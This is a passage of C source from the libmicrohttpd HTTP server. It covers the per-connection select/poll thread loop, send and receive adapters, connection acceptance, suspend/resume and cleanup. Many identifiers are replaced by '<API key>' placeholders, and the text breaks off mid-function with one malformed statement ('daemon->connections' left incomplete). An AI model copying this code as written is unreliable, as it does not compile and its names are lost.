|| (0 != (daemon->options & <API key>))
|| (0 != (daemon->options & MHD_USE_POLL)))
return MHD_NO;
#if EPOLL_SUPPORT
if (0 != (daemon->options & <API key>))
{
/* we're in epoll mode, use the epoll FD as a stand-in for
the entire event set */
return add_to_fd_set (daemon->epoll_fd, read_fd_set, max_fd, fd_setsize);
}
#endif
if (MHD_INVALID_SOCKET != daemon->socket_fd &&
MHD_YES != add_to_fd_set (daemon->socket_fd, read_fd_set, max_fd, fd_setsize))
return MHD_NO;
for (pos = daemon->connections_head; NULL != pos; pos = pos->next)
{
switch (pos->event_loop_info)
{
case <API key>:
if (MHD_YES != add_to_fd_set (pos->socket_fd, read_fd_set, max_fd, fd_setsize))
return MHD_NO;
break;
case <API key>:
if (MHD_YES != add_to_fd_set (pos->socket_fd, write_fd_set, max_fd, fd_setsize))
return MHD_NO;
if (pos->read_buffer_size > pos->read_buffer_offset &&
MHD_YES != add_to_fd_set (pos->socket_fd, read_fd_set, max_fd, fd_setsize))
return MHD_NO;
break;
case <API key>:
if (pos->read_buffer_size > pos->read_buffer_offset &&
MHD_YES != add_to_fd_set (pos->socket_fd, read_fd_set, max_fd, fd_setsize))
return MHD_NO;
break;
case <API key>:
/* this should never happen */
break;
}
}
#if DEBUG_CONNECT
#if HAVE_MESSAGES
if (NULL != max_fd)
MHD_DLOG (daemon,
"Maximum socket in select set: %d\n",
*max_fd);
#endif
#endif
return MHD_YES;
}
/**
* Main function of the thread that handles an individual
* connection when #<API key> is set.
*
* @param data the `struct MHD_Connection` this thread will handle
* @return always 0
*/
static MHD_THRD_RTRN_TYPE_ MHD_THRD_CALL_SPEC_
<API key> (void *data)
{
struct MHD_Connection *con = (struct MHD_Connection*) data;
int num_ready;
fd_set rs;
fd_set ws;
MHD_socket max;
struct timeval tv;
struct timeval *tvp;
unsigned int timeout;
time_t now;
#ifdef HAVE_POLL_H
struct pollfd p[1];
#endif
timeout = con->daemon->connection_timeout;
while ( (MHD_YES != con->daemon->shutdown) &&
(<API key> != con->state) )
{
tvp = NULL;
if (timeout > 0)
{
now = MHD_monotonic_time();
if (unsigned(now - con->last_activity) > timeout)
tv.tv_sec = 0;
else
tv.tv_sec = timeout - (now - con->last_activity);
tv.tv_usec = 0;
tvp = &tv;
}
#if HTTPS_SUPPORT
if (MHD_YES == con->tls_read_ready)
{
/* do not block (more data may be inside of TLS buffers waiting for us) */
tv.tv_sec = 0;
tv.tv_usec = 0;
tvp = &tv;
}
#endif
if (0 == (con->daemon->options & MHD_USE_POLL))
{
/* use select */
int err_state = 0;
FD_ZERO (&rs);
FD_ZERO (&ws);
max = 0;
switch (con->event_loop_info)
{
case <API key>:
if (MHD_YES != add_to_fd_set (con->socket_fd, &rs, &max, FD_SETSIZE))
err_state = 1;
break;
case <API key>:
if (MHD_YES != add_to_fd_set (con->socket_fd, &ws, &max, FD_SETSIZE))
err_state = 1;
if (con->read_buffer_size > con->read_buffer_offset &&
MHD_YES != add_to_fd_set (con->socket_fd, &rs, &max, FD_SETSIZE))
err_state = 1;
break;
case <API key>:
if (con->read_buffer_size > con->read_buffer_offset &&
MHD_YES != add_to_fd_set (con->socket_fd, &rs, &max, FD_SETSIZE))
err_state = 1;
tv.tv_sec = 0;
tv.tv_usec = 0;
tvp = &tv;
break;
case <API key>:
/* how did we get here!? */
goto exit;
}
if (0 != err_state)
{
#if HAVE_MESSAGES
MHD_DLOG (con->daemon,
"Can't add FD to fd_set\n");
#endif
goto exit;
}
num_ready = MHD_SYS_select_ (max + 1, &rs, &ws, NULL, tvp);
if (num_ready < 0)
{
if (EINTR == MHD_socket_errno_)
continue;
#if HAVE_MESSAGES
MHD_DLOG (con->daemon,
"Error during select (%d): `%s'\n",
MHD_socket_errno_,
<API key> ());
#endif
break;
}
/* call appropriate connection handler if necessary */
if ( (FD_ISSET (con->socket_fd, &rs))
#if HTTPS_SUPPORT
|| (MHD_YES == con->tls_read_ready)
#endif
)
con->read_handler (con);
if (FD_ISSET (con->socket_fd, &ws))
con->write_handler (con);
if (MHD_NO == con->idle_handler (con))
goto exit;
}
#ifdef HAVE_POLL_H
else
{
/* use poll */
memset (&p, 0, sizeof (p));
p[0].fd = con->socket_fd;
switch (con->event_loop_info)
{
case <API key>:
p[0].events |= POLLIN;
break;
case <API key>:
p[0].events |= POLLOUT;
if (con->read_buffer_size > con->read_buffer_offset)
p[0].events |= POLLIN;
break;
case <API key>:
if (con->read_buffer_size > con->read_buffer_offset)
p[0].events |= POLLIN;
tv.tv_sec = 0;
tv.tv_usec = 0;
tvp = &tv;
break;
case <API key>:
/* how did we get here!? */
goto exit;
}
if (poll (p, 1,
(NULL == tvp) ? -1 : tv.tv_sec * 1000) < 0)
{
if (EINTR == MHD_socket_errno_)
continue;
#if HAVE_MESSAGES
MHD_DLOG (con->daemon, "Error during poll: `%s'\n",
<API key> ());
#endif
break;
}
if ( (0 != (p[0].revents & POLLIN))
#if HTTPS_SUPPORT
|| (MHD_YES == con->tls_read_ready)
#endif
)
con->read_handler (con);
if (0 != (p[0].revents & POLLOUT))
con->write_handler (con);
if (0 != (p[0].revents & (POLLERR | POLLHUP)))
<API key> (con, <API key>);
if (MHD_NO == con->idle_handler (con))
goto exit;
}
#endif
}
if (<API key> != con->state)
{
#if DEBUG_CLOSE
#if HAVE_MESSAGES
MHD_DLOG (con->daemon,
"Processing thread terminating, closing connection\n");
#endif
#endif
if (<API key> != con->state)
<API key> (con,
<API key>);
con->idle_handler (con);
}
exit:
if (NULL != con->response)
{
<API key> (con->response);
con->response = NULL;
}
return (MHD_THRD_RTRN_TYPE_)0;
}
/**
* Callback for receiving data from the socket.
*
* @param connection the MHD connection structure
* @param other where to write received data to
* @param i maximum size of other (in bytes)
* @return number of bytes actually received
*/
static ssize_t
recv_param_adapter (struct MHD_Connection *connection,
void *other,
size_t i)
{
ssize_t ret;
if ( (MHD_INVALID_SOCKET == connection->socket_fd) ||
(<API key> == connection->state) )
{
<API key> (ENOTCONN);
return -1;
}
#if WINDOWS
ret = recv (connection->socket_fd, (char*) other, i, MSG_NOSIGNAL);
#else
ret = recv (connection->socket_fd, other, i, MSG_NOSIGNAL);
#endif
#if EPOLL_SUPPORT
if (ret < (ssize_t) i)
{
connection->epoll_state &= ~<API key>;
}
#endif
return ret;
}
/**
* Callback for writing data to the socket.
*
* @param connection the MHD connection structure
* @param other data to write
* @param i number of bytes to write
* @return actual number of bytes written
*/
static ssize_t
send_param_adapter (struct MHD_Connection *connection,
const void *other,
size_t i)
{
ssize_t ret;
#if LINUX
MHD_socket fd;
off_t offset;
off_t left;
#endif
if ( (MHD_INVALID_SOCKET == connection->socket_fd) ||
(<API key> == connection->state) )
{
<API key> (ENOTCONN);
return -1;
}
if (0 != (connection->daemon->options & MHD_USE_SSL))
#if WINDOWS
return send (connection->socket_fd, (const char*) other, i, MSG_NOSIGNAL);
#else
return send (connection->socket_fd, other, i, MSG_NOSIGNAL);
#endif
#if LINUX
if ( (connection-><API key> ==
connection-><API key>) &&
(NULL != connection->response) &&
(MHD_INVALID_SOCKET != (fd = connection->response->fd)) )
{
/* can use sendfile */
offset = (off_t) connection-><API key> + connection->response->fd_off;
left = connection->response->total_size - connection-><API key>;
if (left > SSIZE_MAX)
left = SSIZE_MAX; /* cap at return value limit */
if (-1 != (ret = sendfile (connection->socket_fd,
fd,
&offset,
(size_t) left)))
{
#if EPOLL_SUPPORT
if (ret < left)
{
connection->epoll_state &= ~<API key>;
}
#endif
return ret;
}
const int err = MHD_socket_errno_;
if ( (EINTR == err) || (EAGAIN == err) || (EWOULDBLOCK == err) )
return 0;
if ( (EINVAL == err) || (EBADF == err) )
return -1;
}
#endif
#if WINDOWS
ret = send (connection->socket_fd, (const char*) other, i, MSG_NOSIGNAL);
#else
ret = send (connection->socket_fd, other, i, MSG_NOSIGNAL);
#endif
#if EPOLL_SUPPORT
if (ret < (ssize_t) i)
{
connection->epoll_state &= ~<API key>;
}
#endif
if ( (-1 == ret) && (0 == errno) )
errno = ECONNRESET;
return ret;
}
/**
* Signature of main function for a thread.
*
* @param cls closure argument for the function
* @return termination code from the thread
*/
typedef MHD_THRD_RTRN_TYPE_ (MHD_THRD_CALL_SPEC_ *ThreadStartRoutine)(void *cls);
/**
* Create a thread and set the attributes according to our options.
*
* @param thread handle to initialize
* @param daemon daemon with options
* @param start_routine main function of thread
* @param arg argument for start_routine
* @return 0 on success
*/
static int
create_thread (MHD_thread_handle_ *thread,
const struct MHD_Daemon *daemon,
ThreadStartRoutine start_routine,
void *arg)
{
#if defined(<API key>)
pthread_attr_t attr;
pthread_attr_t *pattr;
int ret;
if (0 != daemon->thread_stack_size)
{
if (0 != (ret = pthread_attr_init (&attr)))
goto ERR;
if (0 != (ret = <API key> (&attr, daemon->thread_stack_size)))
{
<API key> (&attr);
goto ERR;
}
pattr = &attr;
}
else
{
pattr = NULL;
}
ret = pthread_create (thread, pattr,
start_routine, arg);
#ifdef <API key>
(void) pthread_setname_np (*thread, "libmicrohttpd");
#endif /* <API key> */
if (0 != daemon->thread_stack_size)
<API key> (&attr);
return ret;
ERR:
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to set thread stack size\n");
#endif
errno = EINVAL;
return ret;
#elif defined(MHD_USE_W32_THREADS)
*thread = CreateThread(NULL, daemon->thread_stack_size, start_routine,
arg, 0, NULL);
return (NULL != (*thread)) ? 0 : 1;
#endif
}
/**
* Add another client connection to the set of connections
* managed by MHD. This API is usually not needed (since
* MHD will accept inbound connections on the server socket).
* Use this API in special cases, for example if your HTTP
* server is behind NAT and needs to connect out to the
* HTTP client.
*
* The given client socket will be managed (and closed!) by MHD after
* this call and must no longer be used directly by the application
* afterwards.
*
* Per-IP connection limits are ignored when using this API.
*
* @param daemon daemon that manages the connection
* @param client_socket socket to manage (MHD will expect
* to receive an HTTP request from this socket next).
* @param addr IP address of the client
* @param addrlen number of bytes in @a addr
* @param external_add perform additional operations needed due
* to the application calling us directly
* @return #MHD_YES on success, #MHD_NO if this daemon could
* not handle the connection (i.e. malloc failed, etc).
* The socket will be closed in any case; 'errno' is
* set to indicate further details about the error.
*/
static int
<API key> (struct MHD_Daemon *daemon,
MHD_socket client_socket,
const struct sockaddr *addr,
socklen_t addrlen,
int external_add)
{
struct MHD_Connection *connection;
int res_thread_create;
unsigned int i;
int eno;
struct MHD_Daemon *worker;
#if OSX
static int on = 1;
#endif
if (NULL != daemon->worker_pool)
{
/* have a pool, try to find a pool with capacity; we use the
socket as the initial offset into the pool for load
balancing */
for (i=0;i<daemon->worker_pool_size;i++)
{
worker = &daemon->worker_pool[(i + client_socket) % daemon->worker_pool_size];
if (worker->connections < worker->connection_limit)
return <API key> (worker,
client_socket,
addr, addrlen,
external_add);
}
/* all pools are at their connection limit, must refuse */
if (0 != MHD_socket_close_ (client_socket))
MHD_PANIC ("close failed\n");
#if ENFILE
errno = ENFILE;
#endif
return MHD_NO;
}
#ifndef WINDOWS
if ( (client_socket >= FD_SETSIZE) &&
(0 == (daemon->options & (MHD_USE_POLL | <API key>))) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Socket descriptor larger than FD_SETSIZE: %d > %d\n",
client_socket,
FD_SETSIZE);
#endif
if (0 != MHD_socket_close_ (client_socket))
MHD_PANIC ("close failed\n");
#if EINVAL
errno = EINVAL;
#endif
return MHD_NO;
}
#endif
#if HAVE_MESSAGES
#if DEBUG_CONNECT
MHD_DLOG (daemon,
"Accepted connection on socket %d\n",
client_socket);
#endif
#endif
if ( (daemon->connections == daemon->connection_limit) ||
(MHD_NO == MHD_ip_limit_add (daemon, addr, addrlen)) )
{
/* above connection limit - reject */
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Server reached connection limit (closing inbound connection)\n");
#endif
if (0 != MHD_socket_close_ (client_socket))
MHD_PANIC ("close failed\n");
#if ENFILE
errno = ENFILE;
#endif
return MHD_NO;
}
/* apply connection acceptance policy if present */
if ( (NULL != daemon->apc) &&
(MHD_NO == daemon->apc (daemon->apc_cls,
addr, addrlen)) )
{
#if DEBUG_CLOSE
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Connection rejected, closing connection\n");
#endif
#endif
if (0 != MHD_socket_close_ (client_socket))
MHD_PANIC ("close failed\n");
MHD_ip_limit_del (daemon, addr, addrlen);
#if EACCESS
errno = EACCESS;
#endif
return MHD_NO;
}
#if OSX
#ifdef SOL_SOCKET
#ifdef SO_NOSIGPIPE
setsockopt (client_socket,
SOL_SOCKET, SO_NOSIGPIPE,
&on, sizeof (on));
#endif
#endif
#endif
if (NULL == (connection = (struct MHD_Connection*) malloc (sizeof (struct MHD_Connection))))
{
eno = errno;
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Error allocating memory: %s\n",
MHD_strerror_ (errno));
#endif
if (0 != MHD_socket_close_ (client_socket))
MHD_PANIC ("close failed\n");
MHD_ip_limit_del (daemon, addr, addrlen);
errno = eno;
return MHD_NO;
}
memset (connection, 0, sizeof (struct MHD_Connection));
connection->pool = MHD_pool_create (daemon->pool_size);
if (NULL == connection->pool)
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Error allocating memory: %s\n",
MHD_strerror_ (errno));
#endif
if (0 != MHD_socket_close_ (client_socket))
MHD_PANIC ("close failed\n");
MHD_ip_limit_del (daemon, addr, addrlen);
free (connection);
#if ENOMEM
errno = ENOMEM;
#endif
return MHD_NO;
}
connection->connection_timeout = daemon->connection_timeout;
if (NULL == (connection->addr = (sockaddr*) malloc (addrlen)))
{
eno = errno;
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Error allocating memory: %s\n",
MHD_strerror_ (errno));
#endif
if (0 != MHD_socket_close_ (client_socket))
MHD_PANIC ("close failed\n");
MHD_ip_limit_del (daemon, addr, addrlen);
MHD_pool_destroy (connection->pool);
free (connection);
errno = eno;
return MHD_NO;
}
memcpy (connection->addr, addr, addrlen);
connection->addr_len = addrlen;
connection->socket_fd = client_socket;
connection->daemon = daemon;
connection->last_activity = MHD_monotonic_time();
/* set default connection handlers */
<API key> (connection);
connection->recv_cls = &recv_param_adapter;
connection->send_cls = &send_param_adapter;
if (0 == (connection->daemon->options & MHD_USE_EPOLL_TURBO))
{
/* non-blocking sockets are required on most systems and for GNUtls;
however, they somehow cause serious problems on CYGWIN (#1824);
in turbo mode, we assume that non-blocking was already set
by 'accept4' or whoever calls 'MHD_add_connection' */
#ifdef CYGWIN
if (0 != (daemon->options & MHD_USE_SSL))
#endif
{
/* make socket non-blocking */
#if !defined(WINDOWS) || defined(CYGWIN)
int flags = fcntl (connection->socket_fd, F_GETFL);
if ( (-1 == flags) ||
(0 != fcntl (connection->socket_fd, F_SETFL, flags | O_NONBLOCK)) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to make socket non-blocking: %s\n",
<API key> ());
#endif
}
#else
unsigned long flags = 1;
if (0 != ioctlsocket (connection->socket_fd, FIONBIO, &flags))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to make socket non-blocking: %s\n",
<API key> ());
#endif
}
#endif
}
}
#if HTTPS_SUPPORT
if (0 != (daemon->options & MHD_USE_SSL))
{
connection->recv_cls = &recv_tls_adapter;
connection->send_cls = &send_tls_adapter;
connection->state = <API key>;
<API key> (connection);
gnutls_init (&connection->tls_session, GNUTLS_SERVER);
gnutls_priority_set (connection->tls_session,
daemon->priority_cache);
switch (daemon->cred_type)
{
/* set needed credentials for certificate authentication. */
case <API key>:
<API key> (connection->tls_session,
<API key>,
daemon->x509_cred);
break;
default:
#if HAVE_MESSAGES
MHD_DLOG (connection->daemon,
"Failed to setup TLS credentials: unknown credential type %d\n",
daemon->cred_type);
#endif
if (0 != MHD_socket_close_ (client_socket))
MHD_PANIC ("close failed\n");
MHD_ip_limit_del (daemon, addr, addrlen);
free (connection->addr);
free (connection);
MHD_PANIC ("Unknown credential type");
#if EINVAL
errno = EINVAL;
#endif
return MHD_NO;
}
<API key> (connection->tls_session,
(<API key>) connection);
<API key> (connection->tls_session,
(gnutls_pull_func) &recv_param_adapter);
<API key> (connection->tls_session,
(gnutls_push_func) &send_param_adapter);
if (daemon->https_mem_trust)
<API key> (connection->tls_session,
GNUTLS_CERT_REQUEST);
}
#endif
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to acquire cleanup mutex\n");
XDLL_insert (daemon->normal_timeout_head,
daemon->normal_timeout_tail,
connection);
DLL_insert (daemon->connections_head,
daemon->connections_tail,
connection);
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to release cleanup mutex\n");
/* attempt to create handler thread */
if (0 != (daemon->options & <API key>))
{
res_thread_create = create_thread (&connection->pid, daemon,
&<API key>, connection);
if (0 != res_thread_create)
{
eno = errno;
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to create a thread: %s\n",
MHD_strerror_ (res_thread_create));
#endif
goto cleanup;
}
}
else
if ( (MHD_YES == external_add) &&
(MHD_INVALID_PIPE_ != daemon->wpipe[1]) &&
(1 != MHD_pipe_write_ (daemon->wpipe[1], "n", 1)) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"failed to signal new connection via pipe");
#endif
}
#if EPOLL_SUPPORT
if (0 != (daemon->options & <API key>))
{
if (0 == (daemon->options & MHD_USE_EPOLL_TURBO))
{
struct epoll_event event;
event.events = EPOLLIN | EPOLLOUT | EPOLLET;
event.data.ptr = connection;
if (0 != epoll_ctl (daemon->epoll_fd,
EPOLL_CTL_ADD,
client_socket,
&event))
{
eno = errno;
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Call to epoll_ctl failed: %s\n",
<API key> ());
#endif
goto cleanup;
}
connection->epoll_state |= <API key>;
}
else
{
connection->epoll_state |= <API key> | <API key>
| <API key>;
EDLL_insert (daemon->eready_head,
daemon->eready_tail,
connection);
}
}
#endif
daemon->connections++;
return MHD_YES;
cleanup:
if (0 != MHD_socket_close_ (client_socket))
MHD_PANIC ("close failed\n");
MHD_ip_limit_del (daemon, addr, addrlen);
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to acquire cleanup mutex\n");
DLL_remove (daemon->connections_head,
daemon->connections_tail,
connection);
XDLL_remove (daemon->normal_timeout_head,
daemon->normal_timeout_tail,
connection);
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to release cleanup mutex\n");
MHD_pool_destroy (connection->pool);
free (connection->addr);
free (connection);
#if EINVAL
errno = eno;
#endif
return MHD_NO;
}
/**
* Suspend handling of network data for a given connection. This can
* be used to dequeue a connection from MHD's event loop (external
* select, internal select or thread pool; not applicable to
* <API key>!) for a while.
*
* If you use this API in conjunction with a internal select or a
* thread pool, you must set the option #<API key> to
* ensure that a resumed connection is immediately processed by MHD.
*
* Suspended connections continue to count against the total number of
* connections allowed (per daemon, as well as per IP, if such limits
* are set). Suspended connections will NOT time out; timeouts will
* restart when the connection handling is resumed. While a
* connection is suspended, MHD will not detect disconnects by the
* client.
*
* The only safe time to suspend a connection is from the
* #<API key>.
*
* Finally, it is an API violation to call #MHD_stop_daemon while
* having suspended connections (this will at least create memory and
* socket leaks or lead to undefined behavior). You must explicitly
* resume all connections before stopping the daemon.
*
* @param connection the connection to suspend
*/
void
<API key> (struct MHD_Connection *connection)
{
struct MHD_Daemon *daemon;
daemon = connection->daemon;
if (<API key> != (daemon->options & <API key>))
MHD_PANIC ("Cannot suspend connections without enabling <API key>!\n");
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to acquire cleanup mutex\n");
DLL_remove (daemon->connections_head,
daemon->connections_tail,
connection);
DLL_insert (daemon-><API key>,
daemon-><API key>,
connection);
if (connection->connection_timeout == daemon->connection_timeout)
XDLL_remove (daemon->normal_timeout_head,
daemon->normal_timeout_tail,
connection);
else
XDLL_remove (daemon->manual_timeout_head,
daemon->manual_timeout_tail,
connection);
#if EPOLL_SUPPORT
if (0 != (daemon->options & <API key>))
{
if (0 != (connection->epoll_state & <API key>))
{
EDLL_remove (daemon->eready_head,
daemon->eready_tail,
connection);
connection->epoll_state &= ~<API key>;
}
if (0 != (connection->epoll_state & <API key>))
{
if (0 != epoll_ctl (daemon->epoll_fd,
EPOLL_CTL_DEL,
connection->socket_fd,
NULL))
MHD_PANIC ("Failed to remove FD from epoll set\n");
connection->epoll_state &= ~<API key>;
}
connection->epoll_state |= <API key>;
}
#endif
connection->suspended = MHD_YES;
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to release cleanup mutex\n");
}
/**
* Resume handling of network data for suspended connection. It is
* safe to resume a suspended connection at any time. Calling this function
* on a connection that was not previously suspended will result
* in undefined behavior.
*
* @param connection the connection to resume
*/
void
<API key> (struct MHD_Connection *connection)
{
struct MHD_Daemon *daemon;
daemon = connection->daemon;
if (<API key> != (daemon->options & <API key>))
MHD_PANIC ("Cannot resume connections without enabling <API key>!\n");
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to acquire cleanup mutex\n");
connection->resuming = MHD_YES;
daemon->resuming = MHD_YES;
if ( (MHD_INVALID_PIPE_ != daemon->wpipe[1]) &&
(1 != MHD_pipe_write_ (daemon->wpipe[1], "r", 1)) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"failed to signal resume via pipe");
#endif
}
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to release cleanup mutex\n");
}
/**
* Run through the suspended connections and move any that are no
* longer suspended back to the active state.
*
* @param daemon daemon context
*/
static void
<API key> (struct MHD_Daemon *daemon)
{
struct MHD_Connection *pos;
struct MHD_Connection *next = NULL;
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to acquire cleanup mutex\n");
if (MHD_YES == daemon->resuming)
next = daemon-><API key>;
while (NULL != (pos = next))
{
next = pos->next;
if (MHD_NO == pos->resuming)
continue;
DLL_remove (daemon-><API key>,
daemon-><API key>,
pos);
DLL_insert (daemon->connections_head,
daemon->connections_tail,
pos);
if (pos->connection_timeout == daemon->connection_timeout)
XDLL_insert (daemon->normal_timeout_head,
daemon->normal_timeout_tail,
pos);
else
XDLL_insert (daemon->manual_timeout_head,
daemon->manual_timeout_tail,
pos);
#if EPOLL_SUPPORT
if (0 != (daemon->options & <API key>))
{
if (0 != (pos->epoll_state & <API key>))
MHD_PANIC ("Resumed connection was already in EREADY set\n");
/* we always mark resumed connections as ready, as we
might have missed the edge poll event during suspension */
EDLL_insert (daemon->eready_head,
daemon->eready_tail,
pos);
pos->epoll_state |= <API key>;
pos->epoll_state &= ~<API key>;
}
#endif
pos->suspended = MHD_NO;
pos->resuming = MHD_NO;
}
daemon->resuming = MHD_NO;
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to release cleanup mutex\n");
}
/**
* Change socket options to be non-blocking, non-inheritable.
*
* @param daemon daemon context
* @param sock socket to manipulate
*/
static void
<API key> (struct MHD_Daemon *daemon,
MHD_socket sock)
{
#ifdef WINDOWS
DWORD dwFlags;
unsigned long flags = 1;
if (0 != ioctlsocket (sock, FIONBIO, &flags))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to make socket non-blocking: %s\n",
<API key> ());
#endif
}
if (!<API key> ((HANDLE) sock, &dwFlags) ||
((dwFlags != (dwFlags & ~HANDLE_FLAG_INHERIT)) &&
!<API key> ((HANDLE) sock, HANDLE_FLAG_INHERIT, 0)))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to make socket non-inheritable: %u\n",
(unsigned int) GetLastError ());
#endif
}
#else
int flags;
int nonblock;
nonblock = O_NONBLOCK;
#ifdef CYGWIN
if (0 == (daemon->options & MHD_USE_SSL))
nonblock = 0;
#endif
flags = fcntl (sock, F_GETFD);
if ( ( (-1 == flags) ||
( (flags != (flags | FD_CLOEXEC)) &&
(0 != fcntl (sock, F_SETFD, flags | nonblock | FD_CLOEXEC)) ) ) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to make socket non-inheritable: %s\n",
<API key> ());
#endif
}
#endif
}
/**
* Add another client connection to the set of connections managed by
* MHD. This API is usually not needed (since MHD will accept inbound
* connections on the server socket). Use this API in special cases,
* for example if your HTTP server is behind NAT and needs to connect
* out to the HTTP client, or if you are building a proxy.
*
* If you use this API in conjunction with a internal select or a
* thread pool, you must set the option
* #<API key> to ensure that the freshly added
* connection is immediately processed by MHD.
*
* The given client socket will be managed (and closed!) by MHD after
* this call and must no longer be used directly by the application
* afterwards.
*
* Per-IP connection limits are ignored when using this API.
*
* @param daemon daemon that manages the connection
* @param client_socket socket to manage (MHD will expect
* to receive an HTTP request from this socket next).
* @param addr IP address of the client
* @param addrlen number of bytes in @a addr
* @return #MHD_YES on success, #MHD_NO if this daemon could
* not handle the connection (i.e. `malloc()` failed, etc).
* The socket will be closed in any case; `errno` is
* set to indicate further details about the error.
* @ingroup specialized
*/
int
MHD_add_connection (struct MHD_Daemon *daemon,
MHD_socket client_socket,
const struct sockaddr *addr,
socklen_t addrlen)
{
<API key> (daemon,
client_socket);
return <API key> (daemon,
client_socket,
addr, addrlen,
MHD_YES);
}
/**
* Accept an incoming connection and create the MHD_Connection object for
* it. This function also enforces policy by way of checking with the
* accept policy callback.
*
* @param daemon handle with the listen socket
* @return MHD_YES on success (connections denied by policy or due
* to 'out of memory' and similar errors) are still considered
* successful as far as <API key> is concerned);
* a return code of MHD_NO only refers to the actual
* 'accept' system call.
*/
static int
<API key> (struct MHD_Daemon *daemon)
{
#if HAVE_INET6
struct sockaddr_in6 addrstorage;
#else
struct sockaddr_in addrstorage;
#endif
struct sockaddr *addr = (struct sockaddr *) &addrstorage;
socklen_t addrlen;
MHD_socket s;
MHD_socket fd;
int nonblock;
addrlen = sizeof (addrstorage);
memset (addr, 0, sizeof (addrstorage));
if (MHD_INVALID_SOCKET == (fd = daemon->socket_fd))
return MHD_NO;
#ifdef HAVE_SOCK_NONBLOCK
nonblock = SOCK_NONBLOCK;
#else
nonblock = 0;
#endif
#ifdef CYGWIN
if (0 == (daemon->options & MHD_USE_SSL))
nonblock = 0;
#endif
#if HAVE_ACCEPT4
s = accept4 (fd, addr, &addrlen, SOCK_CLOEXEC | nonblock);
#else
nonblock = 0; if (nonblock) s = 0;
s = accept (fd, addr, &addrlen);
#endif
if ((MHD_INVALID_SOCKET == s) || (addrlen <= 0))
{
#if HAVE_MESSAGES
const int err = MHD_socket_errno_;
/* This could be a common occurance with multiple worker threads */
if ((EAGAIN != err) && (EWOULDBLOCK != err))
MHD_DLOG (daemon,
"Error accepting connection: %s\n",
<API key> ());
#endif
if (MHD_INVALID_SOCKET != s)
{
if (0 != MHD_socket_close_ (s))
MHD_PANIC ("close failed\n");
/* just in case */
}
return MHD_NO;
}
#if !defined(HAVE_ACCEPT4) || HAVE_ACCEPT4+0 == 0 || !defined(HAVE_SOCK_NONBLOCK) || SOCK_CLOEXEC+0 == 0
<API key> (daemon, s);
#endif
#if HAVE_MESSAGES
#if DEBUG_CONNECT
MHD_DLOG (daemon,
"Accepted connection on socket %d\n",
s);
#endif
#endif
(void) <API key> (daemon, s,
addr, addrlen,
MHD_NO);
return MHD_YES;
}
/**
* Free resources associated with all closed connections.
* (destroy responses, free buffers, etc.). All closed
* connections are kept in the "cleanup" doubly-linked list.
*
* @param daemon daemon to clean up
*/
static void
<API key> (struct MHD_Daemon *daemon)
{
struct MHD_Connection *pos;
if ( (0 != (daemon->options & <API key>)) &&
(MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to acquire cleanup mutex\n");
while (NULL != (pos = daemon->cleanup_head))
{
DLL_remove (daemon->cleanup_head,
daemon->cleanup_tail,
pos);
if ( (0 != (daemon->options & <API key>)) &&
(MHD_NO == pos->thread_joined) )
{
if (0 != MHD_join_thread_ (pos->pid))
{
MHD_PANIC ("Failed to join a thread\n");
}
}
MHD_pool_destroy (pos->pool);
#if HTTPS_SUPPORT
if (pos->tls_session != NULL)
gnutls_deinit (pos->tls_session);
#endif
MHD_ip_limit_del (daemon,
(struct sockaddr *) pos->addr,
pos->addr_len);
#if EPOLL_SUPPORT
if (0 != (pos->epoll_state & <API key>))
{
EDLL_remove (daemon->eready_head,
daemon->eready_tail,
pos);
pos->epoll_state &= ~<API key>;
}
if ( (0 != (daemon->options & <API key>)) &&
(MHD_INVALID_SOCKET != daemon->epoll_fd) &&
(0 != (pos->epoll_state & <API key>)) )
{
if (0 != epoll_ctl (daemon->epoll_fd,
EPOLL_CTL_DEL,
pos->socket_fd,
NULL))
MHD_PANIC ("Failed to remove FD from epoll set\n");
pos->epoll_state &= ~<API key>;
}
#endif
if (NULL != pos->response)
{
<API key> (pos->response);
pos->response = NULL;
}
if (MHD_INVALID_SOCKET != pos->socket_fd)
{
if (0 != MHD_socket_close_ (pos->socket_fd))
MHD_PANIC ("close failed\n");
}
if (NULL != pos->addr)
free (pos->addr);
free (pos);
daemon->connections
}
if ( (0 != (daemon->options & <API key>)) &&
